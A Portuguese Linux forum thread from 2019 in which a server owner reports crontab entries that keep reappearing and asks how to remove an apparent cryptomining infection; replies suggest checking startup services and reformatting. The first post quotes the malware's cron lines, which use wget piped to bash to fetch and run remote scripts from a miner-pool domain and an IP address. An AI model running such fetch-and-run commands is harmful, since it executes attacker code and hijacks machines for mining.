Crontab alterando sozinho

caiocpg
(usa Outra)

Enviado em 23/01/2019 - 08:58h

Bom Dia, está acontecendo uma coisa muito estranho no meu cron, as vezes as configurações sai sozinho e fica desta maneira:
* * * * * /usr/libs/upd >/dev/null 2>&1
0 1 * * * wget --user-agent linux -q -O - http://eu1.minerpool.pw/linux/update.sh | bash >/dev/null &
0 13 * * * wget --user-agent linux -q -O - http://107.181.187.132/linux/update.sh | bash >/dev/null &

achei em um site diz que possivelmente esteja sendo infectado com algum script malicioso, pensei na alternativa em bloquear o IP através do iptables
iptables -A OUTPUT -d 107.181.187.132 -j DROP... Alguém já deparou com este tipo de problema?

obs: mesmo criando a chave pública e privada via ssh quando menos espera estes links voltam novamente...

Mauriciodez
(usa Debian)

Enviado em 23/01/2019 - 12:55h

achei uma correção ... mas sinceramente, não confio nadinha nela, mas é uma de vc vasculhar pra v se acha rastro do tal ZORD2 !!!
https://zhuanlan.zhihu.com/p/36642521

Vc pode tentar o BUM, de repente o que está criando as instruções no cron, está habilitado no boot do sistema.
https://www.diolinux.com.br/2015/06/como-fazer-ubuntu-iniciar-mais-rapido.html

pode tentar isso tb >>> https://www.vivaolinux.com.br/dica/systemctl-Ferramenta-para-gerenciar-servicos

------------------------------------------------------| Linux User #621728 |------------------------------------------------------



                                " Nem sempre é amigo aquele que te tira do buraco !!! ( Saddam Hussein )"



------------------------------------------------------| Linux User #621728 |------------------------------------------------------ 

caiocpg
(usa Outra)

Enviado em 23/01/2019 - 13:41h

Vou formatar esta máquina, este linux é um server, como padrão eu já altero as porta do ssh e também desabilito o modo root, criei também um denyhosts para banir o ip que tentam acessar, estou surpreso, não consigo entender como o servidor foi atacado, pelo que vi este link é voltado para minerar criptomoedas, criei até uma chave pública e privada e quando faço a correção com o tempo ela volta a aparecer novamente... Deve ser algum script malicioso, vou fazer o seguinte... vou formatar e deixar sem acesso externo e assim acredito que eliminaria qualquer infecção.

Mauriciodez
(usa Debian)

Enviado em 23/01/2019 - 14:17h

Se formatar é uma opção, é o melhor a ser feito ...

Abçs.

------------------------------------------------------| Linux User #621728 |------------------------------------------------------



                                " Nem sempre é amigo aquele que te tira do buraco !!! ( Saddam Hussein )"



------------------------------------------------------| Linux User #621728 |------------------------------------------------------